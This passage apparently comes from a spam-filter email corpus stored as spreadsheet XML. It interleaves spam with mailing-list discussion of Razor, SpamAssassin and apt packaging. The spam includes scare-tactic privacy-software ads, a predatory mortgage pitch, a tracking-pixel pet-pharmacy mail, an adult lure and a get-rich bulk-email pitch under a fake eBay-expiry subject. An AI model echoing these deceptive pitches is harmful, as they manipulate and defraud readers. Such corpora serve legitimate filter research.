 EXPOSED&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;br&gt;&lt;b&gt;&lt;font face=3D"Arial,Helvetica"&gt;&amp;nbsp;&lt;/font&gt;&lt;/b&gt;
 &lt;br&gt;&lt;b&gt;&lt;font face=3D"Arial,Helvetica"&gt;&amp;nbsp;&lt;font size=3D+3&gt;Jennifer Love Huitt
 Gets BareNaked!&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;br&gt;&lt;b&gt;&lt;font face=3D"Arial,Helvetica"&gt;&lt;font size=3D+3&gt;J-LO Takes Some =
 "Puffy"&amp;nbsp;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;br&gt;&lt;b&gt;&lt;font face=3D"Arial,Helvetica"&gt;&amp;nbsp;&lt;/font&gt;&lt;/b&gt;
 &lt;br&gt;&lt;b&gt;&lt;font face=3D"Arial,Helvetica"&gt;&lt;font size=3D+2&gt;No Credit Cards, No =
 Checks&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;br&gt;&lt;b&gt;&lt;font face=3D"Arial,Helvetica"&gt;&amp;nbsp;&amp;nbsp;&lt;/font&gt;&lt;/b&gt;
 &lt;br&gt;&lt;b&gt;&lt;font face=3D"Arial,Helvetica"&gt;&lt;font size=3D+4&gt;IT'S &lt;font =
 color=3D"#FF0000"&gt;FREE!&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;br&gt;&lt;b&gt;&lt;font face=3D"Arial,Helvetica"&gt;&lt;font size=3D+2&gt;&amp;nbsp;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;br&gt;&lt;b&gt;&lt;font face=3D"Arial,Helvetica"&gt;&lt;font size=3D+3&gt;&lt;a href=3D"http://www.=
 free-celebhardcore.com/10391"&gt;CLICK
 HERE&lt;/a&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;br&gt;&lt;b&gt;&lt;font face=3D"Arial,Helvetica"&gt;&lt;font size=3D+2&gt;&amp;nbsp;&amp;nbsp;=
 &lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/center&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;&lt;/center&gt;
 &lt;center&gt;&lt;b&gt;&lt;font face=3D"Arial,Helvetica"&gt;&lt;font size=3D+2&gt;&amp;nbsp;=
 &lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;br&gt;
 &lt;hr WIDTH=3D"600"&gt;
 &lt;br&gt;This email was sent to you by CelebX Mailing Service using verify-send
 technology.&amp;nbsp; Your email address
 &lt;br&gt;is automatically inserted into the To and From headers of this email
 to eliminate undeliverable emails and
 &lt;br&gt;excessive net traffic.&amp;nbsp; If you wish to be removed from this mailing,
 please use our &lt;a href=3D"http://www.lesbianslutbags.com/cgi-bin/remove.=
 cgi"&gt;removal
 link here&lt;/a&gt;&lt;/center&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 ------=_NextPart_1493_212580644306344345450286--
</t>
  </si>
  <si>
    <t xml:space="preserve">[Greg Ward]
 &gt; Case of headers is definitely helpful.  SpamAssassin has a rule for it
 &gt; -- if you have headers like "DATE" or "SUBJECT", you get a few more
 &gt; points.
 Across my data, all-caps DATE, SUBJECT, TO, etc indeed appear only in the
 spam collections.  OTOH, they don't appear often -- less than 1% of spam
 messages have at least one of these all-cap header lines.  But when I'm
 fighting what are now sub-1% f-n rates, even rare clues can help!
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Ez Internet Privacy is finally here
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Computer User jlugo ,
 &lt;html&gt;
 &lt;body&gt;
 &lt;p&gt;&lt;font face="Arial" size="2"&gt;YOUR INTERNET USAGE IS BEING TRACKED&lt;br&gt;
 You have no privacy protection.&lt;br&gt;
 Will your BOSS, WIFE or KIDS find out?&lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;/font&gt;&lt;b&gt;&lt;font face="Arial"&gt;
 &lt;a href="http://www185.wiildaccess.com/"&gt;DOWNLOAD EZ INTERNET PRIVACY SOFTWARE&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;&lt;font face="Arial" size="2"&gt;&lt;br&gt;
 &lt;br&gt;
 +++++++++++++++++++++++++++++++++++++++++++&lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 You're in Serious Trouble - It's a Proven Fact!&lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 Deleting &amp;quot;Internet Cache and History&amp;quot; will NOT protect you because any of&lt;br&gt;
 the Web Pages, Pictures, Movies, Videos, Sounds, E-mail, Chat Logs and&lt;br&gt;
 Everything Else you see or do could easily be recovered to Haunt you&lt;br&gt;
 forever! How would you feel if a snoop made this information public to your&lt;br&gt;
 Spouse, Mother &amp;amp; Father, Neighbors, Children, Boss or the Media? It could&lt;br&gt;
 easily Ruin Your Life! Solve all your problems and enjoy all the benefits of&lt;br&gt;
 an &amp;quot;As New PC&amp;quot;, EZ INTERNET PRIVACY SOFTWARE can Speed-Up your PC/Internet Browser,&lt;br&gt;
 reclaim Hard Disk space and Professionally Clean your PC in one easy mouse&lt;br&gt;
 click!&lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 Did you know for example that every click you make on Windows 98 Start Menu&lt;br&gt;
 is logged and stored permanently on a hidden encrypted database within your&lt;br&gt;
 own computer?&lt;br&gt;
 Deleting &amp;quot;internet cache and history&amp;quot;, will not protect you... your PC is&lt;br&gt;
 keeping frightening records of both your online and off-line activity. Any&lt;br&gt;
 of the Web Pages, Pictures, Movies, Videos, Sounds, E-mail and Everything&lt;br&gt;
 Else you or anyone else have ever viewed could easily be recovered - even&lt;br&gt;
 many years later!&lt;br&gt;
 How would you feel if somebody snooped this information out of your computer&lt;br&gt;
 and made it public?&lt;br&gt;
 Do your children or their friends use your computers? What have they&lt;br&gt;
 downloaded and tried to delete?&lt;br&gt;
 Act now! And stop these files coming &amp;quot;back from the dead&amp;quot; to haunt you!&lt;br&gt;
 &amp;nbsp;&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;b&gt;&lt;font face="Arial" size="5"&gt;&lt;a href="http://www185.wiildaccess.com/"&gt;CLICK 
 HERE&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&lt;font size="2"&gt;to be removed &lt;a href="http://www185.wiildaccess.com/takemeoff.html"&gt;Click Here&lt;/a&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [zzzzteana] Height, weight, girth, etc
</t>
  </si>
  <si>
    <t xml:space="preserve">http://www.guardian.co.uk/uk_news/story/0,3604,781616,00.html
 Britons stand tall, if slightly heavy, in Europe
 John Carvel, social affairs editor
 Wednesday August 28, 2002
 The Guardian
 Not every European dimension has been harmonised in Brussels yet. According
 to the Department for Trade and Industry, the average Briton stands head,
 shoulders, girth and bottoms above their continental partners.
 The figures come in a new edition of the department's handbook of
 anthropometric and strength measurements, compiled by ergonomists at the
 University of Nottingham to help manufacturers design products to fit
 people's shape.
 The volume provides 294 measurements ranging from the distance between the
 inner corners of the eyes to the length of the leg between the crease below
 the buttock to the crease at the back of the knee.
 It has discovered that the average British man is 36 millimetres (1 inches)
 taller than his French counterpart.
 The mean height of UK citizens is 1,755.1mm (5ft 9in). Among European men
 only the Dutch are taller, averaging 1,795mm and with a clear height
 advantage over the US men's average of 1,760.4.
 The average British woman is 1,620mm tall (just under 5ft 4in), compared
 with 1,604mm for her French counterpart, 1,610mm for the Italians and
 1,619mm for the Germans. Swedish women average 1,640mm, Dutch 1,650mm and
 Americans 1,626.7mm
 More disturbingly, British men and women are heavier than all the other
 nationalities except the Americans, averaging 79.75 kilos for British men
 and 66.7 for women.
 The average British woman has a chest measurement of 1,007.8mm (39.7
 inches), compared with 965mm for the Italians, 912.6mm for the Japanese and
 806mm for Sri Lankans. American women also top this scale with an average of
 1,047.2mm.
 The average British woman's waist is 840.6mm (33 inches) - also second
 largest behind the Americans. But her bottom at 873.7mm is considerably
 smaller than the Italians at 916mm who beat the Americans into second place.
 The average British male foot is 266.8mm long (10.5 inches), 6mm longer than
 the French and Germans, 3mm more than the Italians and 1mm more than the
 Swedes. But they are just beaten by the Americans at 267.8mm and massively
 outstripped by the Dutch at 275mm.
 However Dutch women have daintier feet than the British, averaging 240mm
 compared with 241.1mm in the UK (9.5 inches). German women average 242mm,
 compared with 245mm for the Swedes and 242.1mm for the Americans.
 The DTI has a less than exhaustive record of ring finger lengths, but on the
 available evidence the British man's finger at 78.7mm (3.1 inches) is 1.7mm
 longer than his German counterpart, but 0.2mm shorter than the American
 average.
 The British woman's ring finger at 72.6mm is 0.4mm smaller than her German
 counterpart and 0.3mm smaller than the American.
 Beverley Norris, research fellow at Nottingham university's institute for
 occupational ergonomics, said the figures were useful for product designers.
 The department has recently completed a study of the pulling force needed to
 open ring pull cans.
 ------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
 4 DVDs Free +s&amp;p Join Now
 http://us.click.yahoo.com/pt6YBB/NXiEAA/MVfIAA/7gSolB/TM
 ---------------------------------------------------------------------~-&gt;
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Finally   collecct   your   judgment (71733)
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Yes we do purchase uncollected Judicial Judgements!!!            st10                           .           
 If you, your company or an acquaintance have an uncollected Judicial Judgement then please call us and find out how we can help you receive the money that the court states you are rightfully due.
 We have strong interest in acquiring uncollected Judicial Judgements in your City and Area.
 J T C is the largest firm in the world specializing in the purchase and collection of Judicial Judgements.
 Currently we are processing over 455 million dollars worth of judgements in the United States alone. We have associate offices in virtually every city in the US and in most foreign countries.
 You have nothing to lose and everything to gain by calling. There is absolutely no cost to you.
 We can be reached Toll free at 1-888-557-5744. in the US or if you are in Canada call 1-310-842-3521. You can call 24 hours per day.
 Thank you for your time.
 ++++++++++++++++++++++++++++++++++++++++++++++++++++
 This ad is produced and sent out by: Add Systems,  NY, NY 1 1 2 2 2. To be  r e m o v e d from our mailing list please email us at boogins@hiphopmaster.com  with r e m o v e in the subject.
 ++++++++++++++++++++++++++++++++++++++++++++++++++++
 ***********************************
 9385
</t>
  </si>
  <si>
    <t xml:space="preserve">What I understood was that the activists on the train refused to pay for
 the food and other items they acquired from the Muslim vendors -- then
 taunted them.
 That may not be true, but it would put things in a more interesting
 light.  Taking food from a small vendor in India and not paying them is
 trying to starve them.
 It sounded consistent with the ideas and purpose of the train full of
 activists.
 I'm rarely an apologist for Muslims anywhere.  Yet I find my sympathies
 with the Muslims in this case, even after they burned the train.
 &gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com] On Behalf Of
 &gt; Stephen D. Williams
 &gt; The pity of it is that some
 &gt; Muslims were ready to give it to them. Their murderous attack on the
 &gt; train-load of VHP activists at Godhra (with its awful, atavistic
 echoes
 &gt; of the killings of Hindus and Muslims by the train-load during the
 &gt; partition riots of 1947) played right into the Hindu extremists'
 hands.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Friend, Great News from PetCareRx.com
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;
 &lt;HEAD&gt;
 &lt;TITLE&gt;whole ad&lt;/TITLE&gt;
 &lt;META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1"&gt;
 &lt;/HEAD&gt;
 &lt;BODY BGCOLOR=#FFFFFF&gt;
 &lt;TABLE WIDTH=400 BORDER=0 CELLPADDING=0 CELLSPACING=0&gt;
 	&lt;TR&gt;
 		&lt;TD COLSPAN=2&gt;
 			&lt;IMG SRC="http://www.petcarerx.com/common/mailer/email_01.gif" WIDTH=400 HEIGHT=104&gt;&lt;/TD&gt;
 	&lt;/TR&gt;
 	&lt;TR&gt;
 		&lt;TD COLSPAN=2&gt;
 			&lt;IMG SRC="http://www.petcarerx.com/common/mailer/email_02.gif" WIDTH=400 HEIGHT=159&gt;&lt;/TD&gt;
 	&lt;/TR&gt;
 	&lt;TR&gt;
 		&lt;TD&gt;
 			&lt;IMG SRC="http://www.petcarerx.com/common/mailer/email_03.gif" WIDTH=203 HEIGHT=137&gt;&lt;/TD&gt;
 		&lt;TD&gt;
 			&lt;A HREF="http://click.mm53.com/sp/t.pl?id=3311:7552100"&gt;&lt;IMG SRC="http://www.petcarerx.com/common/mailer/email_05.gif" WIDTH=197 HEIGHT=137 BORDER=0&gt;&lt;/A&gt;&lt;/TD&gt;
 	&lt;/TR&gt;
 &lt;/TABLE&gt;
 &lt;IMG SRC="http://click.mm53.com/sp/t.pl?id=3312:7552100&amp;o=1" BORDER=0 WIDTH=0 HEIGHT=0&gt; &lt;BR&gt;&lt;P&gt;&lt;BR&gt;&lt;!-- 
 SKY-Email-Address: cypherpunks@einstein.ssz.com 
 SKY-Database: OnlyTheBest
 --&gt;
 &lt;A NAME='unsub'&gt;
 &lt;TABLE align=center border=1 cellpadding=5 cellspacing=0 bordercolor=gray&gt;
 &lt;TD&gt;&lt;TABLE width="600" align=center cellpadding="0" cellspacing="0" border="0" &gt;&lt;TR&gt;
 &lt;TD height=25&gt;&lt;FONT size="2" face="arial,sans-serif" color=gray&gt;Remove yourself from this recurring list by:&lt;/FONT&gt;&lt;/TD&gt;
 &lt;/TR&gt;&lt;TR&gt;
 &lt;TD&gt;&lt;FONT color="gray" size="2" face="arial,sans-serif"&gt;&lt;A href="mailto:unsub-7552100-339@mm53.com"&gt;Clicking here&lt;/A&gt; to send a blank email to unsub-7552100-339@mm53.com&lt;/FONT&gt;&lt;/TD&gt;
 &lt;/TR&gt;&lt;TR&gt;
 &lt;TD align="center"&gt;&lt;FONT size="2" face="arial,sans-serif"&gt;&lt;I&gt;OR&lt;/I&gt;&lt;/FONT&gt;&lt;/TD&gt;
 &lt;/TR&gt;&lt;TR&gt;
 &lt;TD&gt;&lt;FONT face="arial,sans-serif" color="gray" size="2"&gt;Sending a postal mail to CustomerService, 427-3 Amherst Street, Suite 319, Nashua, NH 03063&lt;/FONT&gt;&lt;/TD&gt;
 &lt;/TR&gt;&lt;TR&gt;
 &lt;TD align="CENTER"&gt;&lt;br&gt;&lt;FONT face="arial,sans-serif" size="2" color="black"&gt;&lt;I&gt;This message was sent to address cypherpunks@einstein.ssz.com&lt;/I&gt;&lt;/FONT&gt;&lt;/TD&gt;
 &lt;/TR&gt;&lt;/TABLE&gt;&lt;/TD&gt;&lt;/TABLE&gt;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</si>
  <si>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except that the server doesn't know you are the same person that reported
 the spam, since the identity isn't checked (at least not required, so i
 assume it's not checked) when doing a razor-check
 --
 Daniel Higgins
 Administrateur Systme
 Netcommunications Inc.
 ----- Original Message -----
 From: "Tabor J. Wells" &lt;razor-users@fsckit.net&gt;
 To: "Daniel Higgins" &lt;dhiggins@netc.net&gt;
 Cc: &lt;mail@vipul.net&gt;; "ML-razor-users" &lt;razor-users@example.sourceforge.net&gt;
 Sent: Wednesday, August 07, 2002 10:39 AM
 Subject: Re: [Razor-users] What's wrong with the Razor servers now?
 &gt; On Wed, Aug 07, 2002 at 10:22:13AM -0400,
 &gt; Daniel Higgins &lt;dhiggins@netc.net&gt; is thought to have said:
 &gt;
 &gt; &gt; maybe i'm wrong, but it could be that your trust isn't high enough to
 flag a
 &gt; &gt; single message as spam?
 &gt;
 &gt; It would seem to make sense that regardless of your TeS value, the
 &gt; signatures you report should always come back as spam when you check them
 &gt; since you should always be able to trust yourself. :)
 &gt;
 &gt; --
 &gt; --------------------------------------------------------------------
 &gt; Tabor J. Wells                                razor-users@fsckit.net
 &gt; Fsck It!                 Just another victim of the ambient morality
 &gt;
 &gt;
 &gt; -------------------------------------------------------
 &gt; This sf.net email is sponsored by:ThinkGeek
 &gt; Welcome to geek heaven.
 &gt; http://thinkgeek.com/sf
 &gt; _______________________________________________
 &gt; Razor-users mailing list
 &gt; Razor-users@lists.sourceforge.net
 &gt; https://lists.sourceforge.net/lists/listinfo/razor-users
 &gt;
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf
 _______________________________________________
 Razor-users mailing list
 Razor-users@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Gambler wins 7,000 - and spends it all on horse shiat
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-4,8293091,1717/
 Date: 2002-09-26T23:40:17+01:00
 (Bath Chronicle)
</t>
  </si>
  <si>
    <t xml:space="preserve">On Thu, 2002-08-29 at 01:50, Matthias Saou wrote:
 &gt; &gt; Ah!  The mixer stuff was what made me look for an init script in the
 &gt; &gt; first place, I didn't bother to check whether the existing stuff would
 &gt; &gt; have worked with that.  Will try that out, you can assume silence ==
 &gt; &gt; success :)
 &gt; 
 &gt; Well, from what I've tried, both the main and the PCM (at least) volume
 &gt; levels can be controlled either by "alsamixer" or the good old "aumix".
 Cool, I'll try it out as well as the new RPMs tomorrow.
 &gt; &gt; &gt; &gt;From what I can tell after only 2 days using it : ALSA rocks,
 &gt; &gt; &gt; &gt;especially
 &gt; &gt; &gt; since having a full OSS compatibility results that it breaks nothing at
 &gt; &gt; &gt; all! :-)
 &gt; &gt; 
 &gt; &gt; Agreed.  Though with only 2 hours experience...
 &gt; 
 &gt; I guess/hope some other people from the list will try it out ;-)
 &gt; 
 &gt; Both problems you reported (libasound.so and wrong xine dependency) are now
 &gt; fixed in the current packages.
 Thanks, that was quick!
 -- 
 \/ille Skytt
 ville.skytta at iki.fi
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">On Sun, 2002-07-21 at 10:51, Brian Fahrlander wrote:
 &gt; [branching the thread, here]
 &gt; 
 &gt;     I found another Ximian repository- I don't know if it works yet...
 And even one more at: http://apt-rpm.codefactory.se/  (rh7.2 + 7.3,
 Ximian &amp; gnomehide).
 			-Chris
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Poor Credit? Get a Mortgage NOW                     XK
</t>
  </si>
  <si>
    <t xml:space="preserve">On the topic of
 It is time to refinance!
 Your credit does not matter, we can approve anyone.
 Now is the time to let some of the top mortgage companies 
 in the country compete for your business. 
 If you have good credit we will give you the most amazing 
 rates available anywhere! 
 If you have poor credit, don't worry! We can still refinance 
 you with the most competitive rates in the industry!
 Let Us put Our Expertise to Work for You!
 http://agileconcepts.com/elitemort/
 Or site 2
 http://61.129.81.99/al/elitem/
 Erase
 http://agileconcepts.com/optout.htm
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Living Love - Another legacy of the 60's
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;&gt;&gt;&gt; "S" == Stephen D Williams &lt;sdw@lig.net&gt; writes:
     S&gt; The purpose of our lives is to be free of all addictive traps,
     S&gt; and thus become one with the ocean of Living Love.
 "One choice is a psychosis.  Two, a neurosis" -- Ven Joan Shikai
 Woodward, Northern Mountain Order of the White Wind Zen Community
 just a thought.
 (oh, yes, the bits: Women in Zen - http://lhamo.tripod.com/2zen.htm)
 -- 
 Gary Lawrence Murphy - garym@teledyn.com - TeleDynamics Communications
  - blog: http://www.auracom.com/~teledyn - biz: http://teledyn.com/ -
   "Computers are useless. They can only give you answers." (Picasso)
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: BSkyB recruits heavyweight non-execs
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-3,8688977,215/
 Date: 2002-10-09T03:15:13+01:00
 *Media:* Move could lead to Rupert Murdoch's News Corporation being outvoted on 
 major board decisions.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: problems with apt/synaptic
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Although it looks like I'm replying to myself, I just haven't gotten
 Matthias' reply yet, although I can see it on the website (and I did
 subscribe, but probably to the digest).
 Anyway, Matthias wrote:
 &gt; Once upon a time, Steve wrote :
 &gt; 
 &gt; &gt; I did apt-get update, and it seemed to have gotten the new packages
 &gt; 
 &gt; Hmmm, "it seems"? Check closer as this may be where the problem is
 &gt; coming
 &gt; from.
 &gt; &gt; but doing things like "apt-get install synaptic" didn't work (neither
 &gt; &gt; did other known packages, like apt-get install lame
 &gt; &gt; 
 &gt; &gt; I just get:
 &gt; &gt; root@canarsie:/var/cache/apt # apt-get install lame
 &gt; &gt; Reading Package Lists... Done
 &gt; &gt; Building Dependency Tree... Done
 &gt; &gt; E: Couldn't find package lame
 &gt; 
 &gt; Could you double check what "apt-get update" does? And eventually post
 &gt; the
 &gt; output if there are any errors or messages you don't understand.
 OK, I did it again, and here's what I got:
 root@canarsie:/tmp # apt-get update
 Ign http://apt.freshrpms.net redhat/8.0/en/i386 release
 Hit http://apt.freshrpms.net redhat/8.0/en/i386/os pkglist
 Hit http://apt.freshrpms.net redhat/8.0/en/i386/os release
 Hit http://apt.freshrpms.net redhat/8.0/en/i386/updates pkglist
 Hit http://apt.freshrpms.net redhat/8.0/en/i386/updates release
 Get:1 http://apt.freshrpms.net redhat/8.0/en/i386/freshrpms pkglist [51.8kB]
 Hit http://apt.freshrpms.net redhat/8.0/en/i386/freshrpms release
 Hit http://apt.freshrpms.net redhat/8.0/en/i386/os srclist
 Hit http://apt.freshrpms.net redhat/8.0/en/i386/updates srclist
 Get:2 http://apt.freshrpms.net redhat/8.0/en/i386/freshrpms srclist [12.6kB]
 Fetched 64.4kB in 2s (30.1kB/s)
 Reading Package Lists... Done
 root@canarsie:/tmp # apt-get install lame
 Reading Package Lists... Done
 Building Dependency Tree... Done
 E: Couldn't find package lame
 root@canarsie:/var/cache/apt # ls -ltr
 total 148
 drwxr-xr-x    2 root     root         4096 Sep 29 10:49 gensrclist
 drwxr-xr-x    2 root     root         4096 Sep 29 10:49 genpkglist
 drwxr-xr-x    3 root     root         4096 Sep 29 10:49 archives
 -rw-r--r--    1 root     root        49863 Oct  4 16:00 srcpkgcache.bin
 -rw-r--r--    1 root     root       158131 Oct  4 16:00 pkgcache.bin
 root@canarsie:/var/cache/apt # date
 Fri Oct  4 16:03:15 EDT 2002
 So, it looks like it worked, and the files are updated..  very strange.  
 Maybe something went wrong updating apt from my old version (as used
 with rh7.2), and this one.  Lemme try totally uninstalling and
 reinstalling it..
 root@canarsie:/ # rpm -e apt synaptic
 warning: /etc/apt/sources.list saved as /etc/apt/sources.list.rpmsave
 root@canarsie:/ # ls -l /etc/apt
 total 4
 -rw-r--r--    1 root     root         1610 Oct  4 10:07
 sources.list.rpmsave
 root@canarsie:/ # rpm -ivh /tmp/apt-0.5.4cnc7-fr1.i386.rpm
 warning: /tmp/apt-0.5.4cnc7-fr1.i386.rpm: V3 DSA signature: NOKEY, key
 ID e42d547b
 Preparing...                ###########################################
 [100%]
    1:apt                    ###########################################
 [100%]
 root@canarsie:/ # apt-get update
 Ign http://apt.freshrpms.net redhat/8.0/en/i386 release
 Hit http://apt.freshrpms.net redhat/8.0/en/i386/os pkglist
 Hit http://apt.freshrpms.net redhat/8.0/en/i386/os release
 Hit http://apt.freshrpms.net redhat/8.0/en/i386/updates pkglist
 Hit http://apt.freshrpms.net redhat/8.0/en/i386/updates release
 Hit http://apt.freshrpms.net redhat/8.0/en/i386/freshrpms pkglist
 Hit http://apt.freshrpms.net redhat/8.0/en/i386/freshrpms release
 Hit http://apt.freshrpms.net redhat/8.0/en/i386/os srclist
 Hit http://apt.freshrpms.net redhat/8.0/en/i386/updates srclist
 Hit http://apt.freshrpms.net redhat/8.0/en/i386/freshrpms srclist
 Reading Package Lists... Done
 root@canarsie:/ # apt-get install synaptic
 Reading Package Lists... Done
 Building Dependency Tree... Done
 E: Couldn't find package synaptic
 root@canarsie:/ #
 Still no go...
 I'm stumped.
 -SteveK
 &gt; 
 &gt; Matthias
 &gt; 
 -- 
   Steve Kann - Chief Engineer - 520 8th Ave #2300 NY 10018 -  (212) 533-1775
                 HorizonLive.com - collaborate . interact . learn
    "The box said 'Requires Windows 95, NT, or better,' so I installed Linux."
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">On Sun, 18 Aug 2002, Rob Shavell wrote:
 &gt; down in the tech world than mobile visual communications.. and yet no one
 &gt; seems to give much of a damn that right now that 2 persons can take photos
 &gt; and share them instantly across space.  this is one of the biggest - and
 The word "trivial" comes to mind.
 &gt; last - fundamental changes in human communications.  will be as big as the
 &gt; browser.
 Remote realtime streaming video is neat, but sharing pictures? You invoke 
 big words rather readily.
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">͂ĂԂǂ
 ݂Ƃ̃R{[V
 [^rfIicucj
 _x0082_܂ŉcƂł邩킩܂
 ͂߂ɁI
 http://book-i.net/mutou
 i
 `@Écn9@̓
 ȂǂȂ132iBD]I
 (^-^)/~Fg[
 To Unsubscribe: send mail to majordomo@FreeBSD.org
 with "unsubscribe freebsd-ports" in the body of the message
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Razor-users] razor-cache ?
</t>
  </si>
  <si>
    <t xml:space="preserve">suggestion...
 as I see it, there is a valid need for a "razor-cache" server that is
 available to the local smtp host...
 recursiveness would also be a nice feature, giving us the option to link
 caches to offload the burden on the razor servers...
 it could also allow us to setup local razor caches for private networks that
 can bypass the razor servers all together...
 any commensts ?
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf
 _______________________________________________
 Razor-users mailing list
 Razor-users@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: The new trailer for the Lord of the Rings comes out today on AOL
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-2,8417754,1717/
 Date: 2002-10-01T03:29:20+01:00
 [IMG: http://www.newsisfree.com/Images/fark/aicn.gif ([AintItCoolNews])]
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Your eBay account is about to expire!
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,
 I'm a college dropout.  I work about two hours a day.  
 I'm ambitious, but extremely lazy, and I make over 
 $250,000 a year.  Are you curious yet?
 In a minute I'm going to tell you my secret,
 it's the dirty little secret of the Internet ...
 You've probably heard stories about people making
 whopping huge money online, but you thought they 
 were the big corporate execs, famous programmers, or
 boy-geniuses.
 Well, grasshopper, think again ...
 It's people like you and me that are making the real
 money.  Yep, people like YOU AND ME!
 Ever since the "dot com bubble" burst in 1999, small-time
 entrepreneurs are getting richer while the Fortune 500 
 companies look for bankruptcy lawyers.
 Today small business owners and ordinary folks 
 like you and me can use the web to achieve complete 
 financial freedom with NO INVESTMENT and very little 
 work.  How?  By learning the most profitable marketing 
 technique ever created - it's called BULK EMAIL.
 If you've ever recieved an email advertisement, then 
 you know what bulk email is.  I bet you can't click on 
 DELETE fast enough for most of those ads, right?
 You might not want their product, but remember that 
 thousands of other folks probably do.  Bulk email is a 
 percentage game - every bulker who contacts you 
 makes a six figure income on the Internet.  I 
 guarantee it.  Now let's go back to Math 101 and 
 review some numbers ...
 If you sell on eBay, you pay anywhere from a few
 dollars to over a hundred dollars just to post one
 auction.  How many people see your ad?  Maybe a
 couple thousand or even ten or twenty thousand
 over a period of days.  Using bulk email, YOU CAN
 SEND YOUR AD TO MORE THAN A MILLION PEOPLE A DAY
 at virtually no cost.  Whether your send 100,000
 emails or 100 million emails, the price is the same.
 ZERO!
 Stop paying those outrageous auction listing fees when
 hardly anyone sees your ad!
 Imagine that you have a decent product with a 
 profit margin of $20.00 on each sale.  If you send 
 an email ad to 500,000 people, and only one person 
 in a thousand actually places an order, then you just 
 generated 500 orders and made $10,000 in a few hours 
 of work.  
 It's that simple ...
 All you have to do is convince ONE PERSON OUT OF A
 THOUSAND to buy your stuff and you're FILTHY RICH.
 The best thing is that anyone can do it.  Doesn't 
 matter if you're a nineteen-year-old college student 
 using a dorm-room computer or a fifty-year-old 
 executive working from an office building in New 
 York City.  Anyone, and I repeat ANYONE, can start 
 bulk emailing with virtually no startup costs.  All 
 it takes is a  few days of study, plenty of ambition, 
 and some basic familiarity with the Internet.
 I quit college when I was 19 to capitalize on the 
 "Dot Com" mania, and I've never looked back.  I 
 started with no money, no product to sell, and only 
 the most rudimentary computer skills.  I saw an 
 opportunity and I seized it.  A few years later, 
 I bought my own home - with CASH.  
 You don't need any money.  You don't need a product.
 You don't need to be a computer nerd and no experience
 whatsoever is required.  
 If you saw an employment ad in the newspaper like that
 you'd jump right on it.  It would be a dream come true.
 So what are you waiting for?!
 I'm going to ask you four simple questions.  If you answer
 YES to all of them, then I can almost promise that you
 will make at least $100,000 using bulk email this year.
 Here goes ...
 Do you have basic experience with the web? 
 Do you have a computer and an Internet connection?
 Do you have a few hours each day of free time?  
 Do you want to earn some extra money with an eye towards 
 complete financial freedom?  
 If you answer YES to these questions, you could be
